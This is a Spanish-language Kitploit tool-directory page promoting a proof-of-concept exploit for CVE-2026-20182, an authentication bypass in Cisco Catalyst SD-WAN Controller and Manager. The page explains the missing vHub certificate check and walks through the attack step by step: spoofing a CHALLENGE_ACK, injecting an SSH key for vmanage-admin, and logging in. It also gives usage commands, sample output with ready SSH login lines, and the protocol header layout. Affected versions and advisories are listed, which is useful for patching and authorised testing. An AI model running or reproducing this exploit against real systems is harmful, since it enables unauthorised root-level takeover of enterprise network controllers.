Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/portbuster1337/cve-2026-20182
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónSeguridad en la NubeAutenticaciónRed Teaming
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC - Bypass de autenticación en Cisco Catalyst SD-WAN Controller / Manager (CVSS 10.0)

Ver Repositorio
33hace 3 mesesAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-20182 — Bypass de Autenticación en Cisco Catalyst SD-WAN Controller / Manager

Un exploit de prueba de concepto para CVE-2026-20182, un bypass de autenticación crítico (CVSS 10.0) en el servicio vdaemon DTLS (UDP/12346) en Cisco Catalyst SD-WAN Controller (vSmart) y Manager (vManage).

Divulgado: 14 de mayo de 2026 por Rapid7 (Stephen Fewer y Jonah Burgess)
CISA KEV: Añadido el 14 de mayo de 2026 (Directiva de Emergencia 26-03)
CVSS: 10.0 — CWE-287: Autenticación Incorrecta

Vulnerabilidad

El servicio vdaemon utiliza un handshake DTLS multifase para autenticar pares del plano de control. La función vbond_proc_challenge_ack() implementa la verificación de certificados específica del tipo de dispositivo — pero el tipo de dispositivo 2 (vHub) no tiene una ruta de código de verificación. Enviar un CHALLENGE_ACK con device_type=2 hace que la función pase por todas las condicionales y establezca incondicionalmente peer->authenticated = 1.

No se requieren credenciales válidas, ningún certificado firmado por CA ni conocimiento del despliegue SD-WAN.

Qué Hace el Exploit

  1. Establece una conexión DTLS 1.2 con el servicio vdaemon del objetivo (UDP/12346)
  2. Recibe el mensaje CHALLENGE (msg_type=8)
  3. Envía CHALLENGE_ACK afirmando ser un vHub (device_type=2) → el par se marca como autenticado
  4. Envía HELLO (msg_type=5) → el par transiciona al estado UP
  5. Inyecta una clave pública SSH en /home/vmanage-admin/.ssh/authorized_keys mediante MSG_VMANAGE_TO_PEER (msg_type=14)
  6. Concede acceso NETCONF (SSH TCP/830) o acceso SSH (TCP/22) como vmanage-admin

Uso

root@kitploit:~
python3 cve-2026-20182.py -t <target> [options]

Opciones

ArgumentoDescripción
-t, --targetIP o nombre de host del objetivo
--portPuerto UDP de vdaemon (por defecto: 12346)
--key-fileRuta a una clave pública SSH existente para inyectar (opcional)
--netconfVerificar la explotación conectándose a NETCONF vía SSH

Ejemplos

root@kitploit:~
# Generate a fresh key pair and exploit
python3 cve-2026-20182.py -t 192.168.1.100

# Use an existing public key
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub

# Exploit and verify via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf

Salida

root@kitploit:~
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...

[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]

Versiones Afectadas

VersiónVersión Corregida
< 20.9Migrar a una versión compatible
20.920.9.9.1
20.1020.12.7.1
20.1120.12.7.1
20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
20.1320.15.5.2
20.1420.15.5.2
20.1520.15.4.4 / 20.15.5.2
20.1620.18.2.2
20.1820.18.2.2
26.1.126.1.1.1

Referencias de Investigación

  • Rapid7 (Divulgación Original): CVE-2026-20182: Bypass de autenticación crítico en Cisco Catalyst SD-WAN Controller — Análisis técnico completo, código descompilado y detalles del protocolo por Stephen Fewer y Jonah Burgess
  • Cisco Security Advisory: cisco-sa-sdwan-rpa2-v69WY2SW — Aviso del fabricante con versiones corregidas
  • CISA KEV: CVE-2026-20182 — Directiva de Emergencia 26-03 (remediación antes del 17 de mayo de 2026)
  • NVD: CVE-2026-20182 — Entrada de la Base de Datos Nacional de Vulnerabilidades
  • Módulo Metasploit de Rapid7: cisco_sdwan_vhub_auth_bypass — Módulo auxiliar en el framework Metasploit
  • BleepingComputer: Cisco advierte sobre una nueva falla crítica de SD-WAN explotada en ataques de día cero
  • Tenable: Preguntas frecuentes sobre la explotación continua de vulnerabilidades de Cisco SD-WAN
  • Cisco Talos: Actor de amenazas UAT-8616 atribuido a la explotación de esta vulnerabilidad en entornos reales

Detalles Técnicos

El encabezado del protocolo vdaemon tiene 12 bytes:

DesplazamientoTamañoCampoNotas
01msg_typeNibble bajo = tipo, nibble alto = versión
11device_infoNibble alto = device_type, nibble bajo = flags
21flagsValor estándar 0xA0
31paddingSiempre 0x00
4-74domain_idBig-endian uint32
8-114site_idBig-endian uint32

Tipos de dispositivo: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage

Requisitos

  • Python 3.7+
  • openssl CLI (para transporte DTLS)
  • Biblioteca cryptography (pip install cryptography)

Aviso Legal

Este exploit está destinado exclusivamente a operaciones autorizadas de red team, pruebas de penetración e investigación de seguridad en sistemas donde se tenga permiso explícito por escrito. El uso no autorizado es ilegal.

Descargar herramienta